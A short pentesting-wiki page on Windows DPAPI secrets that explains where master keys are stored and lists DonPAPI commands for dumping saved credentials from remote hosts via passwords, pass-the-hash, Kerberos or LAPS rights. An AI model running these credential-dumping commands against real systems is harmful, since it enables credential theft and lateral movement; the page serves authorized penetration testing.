> For the complete documentation index, see [llms.txt](https://wiki.pentestlist.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://wiki.pentestlist.com/offensive-security/internal-infrastructure/credential-discovery/dpapi-secrets.md).

# DPAPI secrets

## Overview

Windows uses the DPAPI (Data Protection API) to store sensitive data for various applications, such as Outlook, Web browsers and more. Windows also uses DPAPI to store certificates, Wi-Fi credentials, etc.

The DPAPI data is secured by a user-specific master key and is stored within a users directory:

`C:\Users\<USER>\AppData\Roaming\Microsoft\Protect<SUID_GUID>`

## Remotely Dumping

The DPAPI can be dumped **remotely** using DonPapi. However, a users password is required.&#x20;

* <https://github.com/login-securite/DonPAPI>

**Dump all secrets using a domain administrator account (requires local administrator):**

```
DonPAPI <domain>/<user>:<password>@<target>
```

**Dump all secrets using a local administrator account:**

```
DonPAPI -local_auth <user>@<target>
```

**Dump secrets using a users password hash (Pass-The-Hash attack):**

```
DonPAPI --hashes <LM>:<NT> <domain>/<user>@<target>
```

**Dump secrets using kerberos:**

```
DonPAPI -k <domain>/<user>@<target>
```

**Dump secrets using a user with LAPS password reading rights:**

```
DonPAPI -laps <domain>/<user>:<password>@<target>
```
